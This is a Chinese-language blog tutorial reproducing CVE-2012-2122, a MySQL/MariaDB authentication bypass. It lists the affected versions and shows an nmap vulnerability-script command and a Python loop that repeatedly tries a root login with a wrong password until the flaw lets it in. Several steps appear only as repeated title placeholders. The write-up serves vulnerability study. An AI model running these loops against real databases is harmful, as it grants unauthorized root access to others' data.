复现goby——CVE-2012-2122(Mysql 身份认证绕过)

一、漏洞介绍

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次。只要知道用户名,不断尝试就能够直接登入SQL数据库。)


二、影响版本

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.


三、goby扫描结果

复现goby——CVE-2012-2122(Mysql 身份认证绕过)


四、漏洞复现

(一)利用goby自带的漏洞exp进行验证通过即代表有的。

复现goby——CVE-2012-2122(Mysql 身份认证绕过)

(二)利用msf——metasploit渗透框架

复现goby——CVE-2012-2122(Mysql 身份认证绕过)

(三) 利用Linux中for循环遍历

复现goby——CVE-2012-2122(Mysql 身份认证绕过)

复现goby——CVE-2012-2122(Mysql 身份认证绕过)

 (四)利用nmap自带的脚本模块进行复现

nmap -sV -T4 -p3306  --script=mysql-vuln-cve2012-2122 x.x.x.x

复现goby——CVE-2012-2122(Mysql 身份认证绕过)

(五)利用pyhon中的subprocess模块和while循环遍历

import subprocess

while 8:
    subprocess.Popen("mysql -h x.x.x.x -u root mysql --password=blan",shell=True).wait()

上一篇:删除docker里的的容器


下一篇:视图而不是一个表